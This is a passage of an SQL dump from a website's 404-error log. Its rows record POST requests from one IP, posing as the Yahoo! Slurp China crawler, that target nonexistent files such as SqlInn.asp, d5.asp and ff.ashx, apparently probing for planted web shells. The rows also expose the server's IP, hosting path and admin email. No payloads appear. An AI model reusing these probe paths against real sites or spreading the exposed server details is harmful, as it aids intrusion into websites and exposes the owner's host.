http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"219.234.26.19\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"219.234.26.19\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/Index.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/Index.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMl5d0uitCPf4ohr-kbgAAAVU\";s:12:\"REDIRECT_URL\";s:18:\"/images/Index.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54899\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/Index.ashx\";s:10:\"SCRIPT_URL\";s:18:\"/images/Index.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMl5d0uitCPf4ohr-kbgAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589271.9732\";s:12:\"REQUEST_TIME\";s:10:\"1571589271\";}}','notice','2019-10-20 16:34:33','2019-10-20 16:34:32',35340696,37141904,'http://bintara.com.my//images/Index.ashx',1,0,'219.234.26.19'),(28510,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/Index.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"123.199.171.77\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"123.199.171.77\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/Index.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/Index.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMm5d0uitCPf4ohr-kcQAAAUI\";s:12:\"REDIRECT_URL\";s:18:\"/images/Index.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"54899\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/Index.ashx\";s:10:\"SCRIPT_URL\";s:18:\"/images/Index.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMm5d0uitCPf4ohr-kcQAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589275.2712\";s:12:\"REQUEST_TIME\";s:10:\"1571589275\";}}','notice','2019-10-20 16:34:36','2019-10-20 16:34:35',35269008,37069512,'http://bintara.com.my//images/Index.ashx',1,0,'123.199.171.77'),(28511,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/SqlInn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.30.167.223\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.30.167.223\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/SqlInn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/SqlInn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMqI0ygb@uBJr9fsz-ygAAAQo\";s:12:\"REDIRECT_URL\";s:18:\"/images/SqlInn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55333\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/SqlInn.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/SqlInn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMqI0ygb@uBJr9fsz-ygAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589288.6325\";s:12:\"REQUEST_TIME\";s:10:\"1571589288\";}}','notice','2019-10-20 16:34:50','2019-10-20 16:34:49',35341920,37144024,'http://bintara.com.my//images/SqlInn.asp',1,0,'218.30.167.223'),(28512,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/SqlInn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.232.125.121\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.232.125.121\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/SqlInn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/SqlInn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMscpDb2HpNZKJEUbcfwAAAAg\";s:12:\"REDIRECT_URL\";s:18:\"/images/SqlInn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/SqlInn.asp\";s:10:\"SCRIPT_URL\";s:18:\"/images/SqlInn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMscpDb2HpNZKJEUbcfwAAAAg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589297.8775\";s:12:\"REQUEST_TIME\";s:10:\"1571589297\";}}','notice','2019-10-20 16:35:00','2019-10-20 16:34:58',35270112,37075304,'http://bintara.com.my//images/SqlInn.asp',1,0,'61.232.125.121'),(28513,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/login.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.241.145.132\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.241.145.132\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMuMpDb2HpNZKJEUbclwAAABU\";s:12:\"REDIRECT_URL\";s:16:\"/admin/login.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/login.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMuMpDb2HpNZKJEUbclwAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589304.9671\";s:12:\"REQUEST_TIME\";s:10:\"1571589304\";}}','notice','2019-10-20 16:35:06','2019-10-20 16:35:05',35341744,37140200,'http://bintara.com.my//admin/login.asp',1,0,'61.241.145.132'),(28514,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//admin/d5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.160.134.96\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.160.134.96\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/admin/d5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/admin/d5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMxY0ygb@uBJr9fsz-3AAAAQk\";s:12:\"REDIRECT_URL\";s:13:\"/admin/d5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56246\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/admin/d5.asp\";s:10:\"SCRIPT_URL\";s:13:\"/admin/d5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMxY0ygb@uBJr9fsz-3AAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571589317.376\";s:12:\"REQUEST_TIME\";s:10:\"1571589317\";}}','notice','2019-10-20 16:35:19','2019-10-20 16:35:17',35340208,37136944,'http://bintara.com.my//admin/d5.asp',1,0,'211.160.134.96'),(28515,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//plus/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"59.71.220.129\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"59.71.220.129\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/plus/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayM0Jd0uitCPf4ohr-kjAAAAUk\";s:12:\"REDIRECT_URL\";s:15:\"/plus/index.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56478\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/plus/index.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayM0Jd0uitCPf4ohr-kjAAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589328.5584\";s:12:\"REQUEST_TIME\";s:10:\"1571589328\";}}','notice','2019-10-20 16:35:30','2019-10-20 16:35:28',35272768,37077120,'http://bintara.com.my//plus/index.php',1,0,'59.71.220.129'),(28516,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//API/DW/2/ff.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.242.247.130\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.242.247.130\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/API/DW/2/ff.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/API/DW/2/ff.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayM8ANyE4PJlyugCritlgAAAI0\";s:12:\"REDIRECT_URL\";s:17:\"/API/DW/2/ff.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57265\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/API/DW/2/ff.ashx\";s:10:\"SCRIPT_URL\";s:17:\"/API/DW/2/ff.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayM8ANyE4PJlyugCritlgAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589360.2288\";s:12:\"REQUEST_TIME\";s:10:\"1571589360\";}}','notice','2019-10-20 16:36:02','2019-10-20 16:36:00',35344920,37143680,'http://bintara.com.my//API/DW/2/ff.ashx',1,0,'61.242.247.130'),(28517,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//API/DW/2/ff.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"221.239.112.229\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"221.239.112.229\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/API/DW/2/ff.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/API/DW/2/ff.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayM9wNyE4PJlyugCritmQAAAIk\";s:12:\"REDIRECT_URL\";s:17:\"/API/DW/2/ff.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57265\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/API/DW/2/ff.ashx\";s:10:\"SCRIPT_URL\";s:17:\"/API/DW/2/ff.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayM9wNyE4PJlyugCritmQAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589367.4374\";s:12:\"REQUEST_TIME\";s:10:\"1571589367\";}}','notice','2019-10-20 16:36:08','2019-10-20 16:36:07',35270200,37063280,'http://bintara.com.my//API/DW/2/ff.ashx',1,0,'221.239.112.229'),(28518,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//UploadFiles/1.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 